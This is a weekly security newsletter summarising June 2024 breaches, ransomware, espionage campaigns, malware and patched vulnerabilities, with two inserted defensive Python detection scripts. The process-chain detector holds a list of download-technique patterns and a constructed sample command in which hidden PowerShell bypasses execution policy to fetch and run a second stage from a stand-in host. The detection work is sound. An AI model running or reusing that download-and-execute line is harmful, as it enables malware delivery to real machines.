InfoSec MASHUP - Week 23/2024
Malware can steal data recorded by MS Recall; Tom Cruise's voice used in deepfake; PandaBuy paid ransom, twice; London hospitals revert to paper records after attack
Partners and Affiliates
🔐 NordVPN’s Spring Sale Campaign (May 2 - Jun 12)
Special offer update:
🇺🇸 USA & 🇸🇪 Sweden: up to 74% off + 3 months extra
🇬🇧 UK, 🇩🇪 Germany, 🇳🇱 Netherlands, 🇮🇹 Italy, 🇫🇷 France: up to 73% off + 3 months extra
🌍 Rest: up to 75% off + 3 months extra
Breaches & Security Incidents
🔓 🇨🇳 Chinese shopping platform Pandabuy paid a ransom to prevent the leak of stolen data, but the same threat actor extorted the company again. The data breach, which exposed customer information, was caused by critical vulnerabilities in the PandaBuy API. The company confirmed paying the hacker but stated that they would no longer cooperate with him. Users are advised to reset their passwords and be cautious of unsolicited messages claiming to be from Pandabuy.
🔓 🇺🇸 Threat actors have stolen 3TB of data from Advance Auto Parts after breaching the company's Snowflake account. The stolen data includes customer profiles, customer orders, loyalty/gas card numbers, auto parts information, sales history, employment candidate info, and transaction tender details. The data is being sold online for $1.5 million. Advance Auto Parts has not publicly disclosed the breach or notified the U.S. Securities and Exchange Commission. Snowflake, the cloud data platform provider, has been targeted in recent attacks, with other companies like Santander and Ticketmaster also being affected.
🔓 🇦🇺 Australian mining company Northern Minerals confirmed a data breach after a ransomware group leaked information stolen from the company. The leaked data includes operational, financial, and personal information, as well as corporate email archives. The breach, discovered in March 2024, has not had a material impact on the company's operations. It is unclear whether the company engaged in communication with the hackers, but the fact that the data was made public suggests that no ransom was paid.
🇬🇧 🏥 A ransomware attack on Synnovis, a pathology and diagnostic services provider, has disrupted healthcare services at several major NHS hospitals in London. The affected hospitals, including Guy's and St Thomas' and King's College, are experiencing significant impacts, especially in blood transfusions. Some services have been canceled or redirected. The NHS is working with the National Cyber Security Centre to assess the situation. Synnovis, previously known as Viapath, experienced data center issues rendering systems inaccessible.
➝ Qilin ransomware gang linked to attack on London hospitals
➝ London NHS hospitals revert to paper records after cyber-attack
🔓 A massive trove of 361 million email addresses from stolen credentials has been added to the Have I Been Pwned data breach notification service. These credentials were collected from Telegram cybercrime channels and include username and password combinations, along with the URLs they were captured on. Data of this kind typically originates from password-stealing malware and data breaches and is used for credential stuffing attacks.
🔓 🤗 Hugging Face detected unauthorized access to its Spaces platform, potentially exposing a subset of Spaces' secrets. The company has revoked compromised tokens, advised users to refresh keys or tokens, and called in external forensics experts. They have also made security improvements and plan to deprecate "classic" tokens in the future. This incident follows the discovery of exposed Hugging Face API tokens in 2023, highlighting the importance of AI security.
Cybercrime, Cyber Espionage, APTs
🇺🇸 💰 US authorities have filed a civil forfeiture action to recover over $5.3 million lost by a Massachusetts workers union in a business email compromise (BEC) scam. The union fell victim to a spoofed email and transferred the money to a fraudulent account. Authorities have seized the funds in several bank accounts and are seeking forfeiture. BEC schemes continue to pose a serious threat, with losses reaching a record $12.5 billion in 2023.
🇨🇳 👀 Chinese state-sponsored actors have teamed up in a cyber espionage campaign known as Crimson Palace, targeting a government agency in Southeast Asia since at least March 2022. The campaign involves new malware variants and three activity clusters, indicating a coordinated attack. The clusters, named Alpha, Bravo, and Charlie, have different objectives such as disrupting network communications, lateral movement and persistence, and extensive reconnaissance. The activity is believed to be centrally coordinated under a single organization. The campaign demonstrates a high level of coordination and is aimed at furthering Chinese state interests. Sophos continues to monitor the intrusion activity in the target network.
🇺🇸 🔐 The FBI has obtained over 7,000 LockBit ransomware decryption keys and is urging victims to contact them for assistance. Victims can fill out a form on the FBI's Internet Crime Complaint Center (IC3) website or use a decryptor developed by Japanese police. The LockBit ransomware has been used in over 2,400 attacks worldwide, causing billions of dollars in damages. The alleged mastermind of the operation has been charged and a $10 million reward has been offered for information on LockBit leaders.
🇪🇸 📺 Spanish police have dismantled an illegal media content distribution network that generated over $5.7 million in revenue since 2015. The network operated two websites hosting the illegal IPTV service 'TVMucho,' providing illegal access to 130 international TV channels and films. Eight individuals were arrested, and servers supporting 16 illegal streaming sites were taken offline. Subscribers' information is now in the hands of the police, potentially leading to fines for accessing illegal streaming services.
Government, Politics, and Privacy
💻 👀 Microsoft's new Recall feature in Windows 11 raises concerns about security and privacy: Recall records everything a user does on their PC, including sensitive information, without redacting it. The implementation of Recall has serious flaws, making it easy for unauthorized users to access and view the recorded data. The default settings of Recall capture a large amount of user data, and the minimal safeguards in place are not sufficient to protect it. Given Microsoft's track record with security and privacy issues, there is a lack of trust in the company's ability to keep the collected data private. Improvements to Recall's security and privacy measures are necessary before its general release.
🇪🇺 👀 Microsoft is facing privacy complaints in the European Union over the use of its Microsoft 365 Education suite in schools. Privacy rights non-profit noyb has lodged two complaints with Austria's data protection authority, focusing on transparency and legal basis issues, as well as secret tracking of children. The complaints argue that Microsoft is evading its legal responsibilities by shifting compliance onto schools and not providing clear information about data processing. The General Data Protection Regulation (GDPR) sets high expectations for the protection of children's data, and confirmed breaches can result in significant fines.
Malware & Threats
🦠 🇺🇦 CERT-UA has reported a cyberattack campaign named "SickSync" by the UAC-0020 (Vermin) hacking group, targeting Ukrainian defense forces. Linked to the Luhansk People's Republic and aligned with Russian interests, Vermin uses phishing emails with a RARSFX archive that deploys SyncThing and SPECTR malware. SyncThing facilitates peer-to-peer data theft, while SPECTR steals files, screenshots, USB data, and authentication information from browsers and messengers. The use of legitimate software helps evade detection. CERT-UA advises that any interaction with SyncThing’s infrastructure indicates a potential system compromise, warranting immediate investigation.
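CERT-UA's advice above turns into a concrete detection once you know where Syncthing phones home. The script below is an added example, not code from CERT-UA or this newsletter: it reads BIND-style resolver query logs and flags any client, other than hosts where Syncthing is sanctioned, that resolves names under Syncthing's public zone. It assumes that Syncthing's global discovery and relay services live under syncthing.net (discovery.syncthing.net, relays.syncthing.net); the client addresses, allowlist and log lines are constructed.

```python
"""Flag DNS lookups of Syncthing's public discovery/relay services.

Added example; not code from CERT-UA or the newsletter. Assumes BIND-style
resolver query logs and that Syncthing's public infrastructure lives under
syncthing.net (e.g. discovery.syncthing.net, relays.syncthing.net); hosts and
log lines below are constructed.
"""
import re
from dataclasses import dataclass

# Assumption: Syncthing's global discovery and relay pool are served from
# this zone. Add any further relays observed in your own environment.
SUSPECT_SUFFIXES = ("syncthing.net",)

# Constructed: the one host where Syncthing is sanctioned; everything else
# talking to its infrastructure gets investigated.
ALLOWED_CLIENTS = {"10.0.5.20"}

# BIND 9 query log line, e.g.
#   client @0x7f1c2c0 10.0.5.7#51234 (example.com): query: example.com IN A + (10.0.5.1)
QUERY_RE = re.compile(
    r"client (?:@0x[0-9a-f]+ )?(?P<ip>\d{1,3}(?:\.\d{1,3}){3})#\d+ "
    r"\([^)]*\): query: (?P<qname>\S+) IN (?P<qtype>\S+)"
)


@dataclass(frozen=True)
class Hit:
    client: str
    qname: str
    qtype: str


def normalise(qname: str) -> str:
    """Lower-case and strip the trailing dot of a fully qualified name."""
    return qname.rstrip(".").lower()


def is_suspect(qname: str) -> bool:
    """True only when qname is exactly a suspect zone or a label under it.

    Matching on a dotted boundary avoids false positives on look-alikes such
    as mysyncthing.net and is not fooled by syncthing.net.lookalike.example.
    """
    q = normalise(qname)
    return any(q == s or q.endswith("." + s) for s in SUSPECT_SUFFIXES)


def scan(lines, allowed=ALLOWED_CLIENTS):
    """Return one Hit per query to suspect infrastructure from a non-allowed client."""
    hits = []
    for line in lines:
        m = QUERY_RE.search(line)
        if not m or m["ip"] in allowed:
            continue
        if is_suspect(m["qname"]):
            hits.append(Hit(m["ip"], normalise(m["qname"]), m["qtype"]))
    return hits


def clients_to_investigate(hits):
    """Collapse hits into {client_ip: sorted list of names queried}."""
    out = {}
    for h in hits:
        out.setdefault(h.client, set()).add(h.qname)
    return {ip: sorted(names) for ip, names in out.items()}


# Constructed sample log: one unsanctioned host reaching discovery and relay
# services, the sanctioned host doing the same, and two look-alike names.
SAMPLE_LOG = [
    "06-Jun-2024 09:12:01.123 client @0x7f1c2c0 10.0.5.7#51234 (discovery.syncthing.net): query: discovery.syncthing.net IN A + (10.0.5.1)",
    "06-Jun-2024 09:12:01.140 client @0x7f1c2c0 10.0.5.7#51240 (relays.syncthing.net): query: relays.syncthing.net IN A + (10.0.5.1)",
    "06-Jun-2024 09:12:05.001 client @0x7f1c2d0 10.0.5.20#40000 (discovery.syncthing.net): query: discovery.syncthing.net IN A + (10.0.5.1)",
    "06-Jun-2024 09:12:07.300 client @0x7f1c2e0 10.0.5.9#40001 (www.example.org): query: www.example.org IN AAAA + (10.0.5.1)",
    "06-Jun-2024 09:12:09.512 client @0x7f1c2e0 10.0.5.9#40002 (syncthing.net.lookalike.example): query: syncthing.net.lookalike.example IN A + (10.0.5.1)",
    "06-Jun-2024 09:12:11.777 client @0x7f1c2f0 10.0.5.11#40003 (mysyncthing.net): query: mysyncthing.net IN A + (10.0.5.1)",
]

if __name__ == "__main__":
    for ip, names in clients_to_investigate(scan(SAMPLE_LOG)).items():
        print(f"investigate {ip}: {', '.join(names)}")
```

The allowlist is the important design choice: Syncthing is legitimate software, so the signal is not the lookup itself but a lookup from a host that has no business running it. Run the same check against proxy or firewall logs if endpoints bypass the internal resolver.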
🦠 🗒️ Cybercriminals have launched a sophisticated cyber attack in Ukraine using an MS Excel macro to deploy Cobalt Strike and gain control of compromised hosts. The attack involves a multi-stage malware strategy, evasion techniques, and location-based checks to ensure successful payload delivery. The attackers utilize encoded strings, DLL files, and a DLL injector to facilitate persistence and evade detection.
🦠 🐍 Hackers targeted Python developers with a fake package called "crytic-compilers" on the Python Package Index (PyPI), which delivered an information stealer called Lumma. The rogue package was downloaded 441 times before being taken down. This incident highlights the trend of threat actors targeting open-source registries for distributing malware.
🦠 📷 Researchers have demonstrated how malware can steal data collected by Microsoft's Recall feature, which takes screenshots at regular intervals to capture user activities. Concerns have been raised about potential privacy issues and the intrusiveness of the feature. Researchers have shown that a remote desktop manager password collected by Recall can easily be recovered from a local unencrypted SQLite database, making it vulnerable to information-stealing malware. Microsoft claims that physical access and valid credentials are required to obtain the collected data, but researchers have proven otherwise.
🦠 💻 Fake browser updates are being used to distribute BitRAT and Lumma Stealer malware: These malicious updates redirect users to a bogus browser update page, where they are prompted to download a ZIP archive file containing JavaScript files that trigger the execution of PowerShell scripts. The scripts retrieve additional payloads, including BitRAT and Lumma Stealer, from a remote server. BitRAT allows attackers to harvest data and mine cryptocurrency, while Lumma Stealer captures information from web browsers and crypto wallets. These attacks demonstrate the ability of threat actors to leverage trusted names to maximize impact.
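The delivery chain described above (ZIP archive, JavaScript file, PowerShell download of the next stage) leaves a distinctive parent/child process trail on the endpoint. The following added example, which is not code from the newsletter or the cited research, scores process-creation events for a shell spawned by a Windows script host, weighting the score when the script sits in a user-writable directory and when the shell's command line shows download intent. The events are constructed in the shape of Sysmon Event ID 1 records; every path, PID, URL and command line is made up for the demonstration.

```python
"""Score parent/child process chains of the kind used by fake-update lures.

Added example; not code from the newsletter or the cited research. Events
are constructed in the shape of Sysmon Event ID 1 (process creation) records;
the paths, PIDs, URLs and command lines are all made up for this demonstration.
"""
from dataclasses import dataclass

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}   # hosts that run .js/.vbs droppers
SHELLS = {"powershell.exe", "pwsh.exe"}
# Substrings that indicate a shell pulling a further stage from the network.
DOWNLOAD_MARKERS = (
    "invoke-webrequest", "iwr ", "downloadstring", "downloadfile",
    "net.webclient", "start-bitstransfer", "-encodedcommand", "-enc ",
)
# Directories a user can write to; a script run from here was dropped recently.
USER_WRITABLE = ("\\downloads\\", "\\appdata\\local\\temp\\", "\\temp\\")
ALERT_THRESHOLD = 3


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the executable
    cmdline: str


@dataclass
class Finding:
    pid: int
    score: int
    chain: list     # image basenames from the flagged process up to its root
    markers: list


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def lineage(ev: ProcEvent, by_pid: dict, max_depth: int = 6) -> list:
    """Walk ppid links upward; stop at the root or at a missing/looping parent."""
    chain = [ev]
    seen = {ev.pid}
    while len(chain) < max_depth:
        parent = by_pid.get(chain[-1].ppid)
        if parent is None or parent.pid in seen:
            break
        seen.add(parent.pid)
        chain.append(parent)
    return chain


def detect(events) -> list:
    """Flag shells spawned by a script host, weighted by dropper location and download intent."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        if basename(e.image) not in SHELLS:
            continue
        parent = by_pid.get(e.ppid)
        if parent is None or basename(parent.image) not in SCRIPT_HOSTS:
            continue                       # this rule covers script host -> shell only
        score = 1                          # a script host launching a shell
        cmd = e.cmdline.lower()
        markers = [m for m in DOWNLOAD_MARKERS if m in cmd]
        if markers:
            score += 2                     # the shell reaches out for a next stage
        if any(d in parent.cmdline.lower() for d in USER_WRITABLE):
            score += 1                     # the script lives where a lure would drop it
        if score >= ALERT_THRESHOLD:
            chain = [basename(p.image) for p in lineage(e, by_pid)]
            findings.append(Finding(e.pid, score, chain, markers))
    return findings


# Constructed events: a lure chain (explorer -> wscript -> powershell with a
# download), a legitimate logon script running an inventory script, and a
# shell started directly from explorer (outside this rule's scope).
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\wscript.exe",
              r'"C:\Windows\System32\wscript.exe" "C:\Users\alice\Downloads\ChromeUpdate\update.js"'),
    ProcEvent(201, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://updates.invalid/stage2')\""),
    ProcEvent(300, 100, r"C:\Windows\System32\cscript.exe", r'cscript.exe "C:\Scripts\logon.vbs"'),
    ProcEvent(301, 300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\Scripts\inventory.ps1"),
    ProcEvent(400, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -c \"Invoke-WebRequest http://intranet.example/report.csv\""),
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"pid {f.pid} score {f.score}: {' <- '.join(f.chain)} markers={f.markers}")
```

The scoring keeps a plain logon script that launches PowerShell below the alert threshold while the lure chain scores on all three factors; tune the markers and writable directories to what your own endpoints legitimately do.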
AI, Tech & Tools
🎙️ In this episode of Darknet Diaries, Joseph Cox (https://x.com/josephfcox) tells us the story of ANOM, a secure phone made by criminals, for criminals.
🇷🇺 🎙️ Russian agents have deployed an AI-produced deepfake of Tom Cruise's voice to narrate a fake documentary called "Olympics Have Fallen" that criticizes the International Olympic Committee (IOC). The documentary, which falsely claimed to have received positive reviews from reputable sources, was part of a larger influence operation by the Russian government to discredit the IOC and discourage participation in the Paris Olympics. Other tactics used in the operation include spreading fake videos and press releases, impersonating media outlets, and creating disinformation websites. Microsoft has attributed the majority of this activity to two Russian groups known as Storm-1679 and Storm-1099.
Vulnerabilities, Research, and Threat Intelligence
Cisco Patches Webex Bugs Following Exposure of German Government Meetings
Progress Patches Critical Vulnerability in Telerik Report Server
TikTok fixes zero-day bug used to hijack high-profile accounts
Zyxel Releases Patches for Firmware Vulnerabilities in EoL NAS Models
⚠️ 💥 Akamai has warned of fresh attacks exploiting two remote code execution (RCE) vulnerabilities in ThinkPHP, patched over five years ago. The flaws, CVE-2018-20062 and CVE-2019-9082, affect older versions of the ThinkPHP framework. Recent attack campaigns, one from October 2023 and another ongoing since April 2024, involve a Chinese-speaking threat actor using these vulnerabilities to deploy the Dama web shell, allowing extensive control over compromised servers. This includes navigating the file system, tampering with files, network port scanning, database access, and privilege escalation. Despite patches being available since 2018 and 2019, continued exploitation underscores the need for urgent updates to the latest ThinkPHP version.
🐛 The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a security flaw in Oracle WebLogic Server to the Known Exploited Vulnerabilities catalog, citing evidence of active exploitation. Tracked as CVE-2017-3506, the vulnerability allows for OS command injection, enabling unauthorized access and complete control. The China-based cryptojacking group known as the 8220 Gang has a history of leveraging this vulnerability to create a crypto-mining botnet. Federal agencies are advised to apply the latest fixes by June 24, 2024, to protect against potential threats.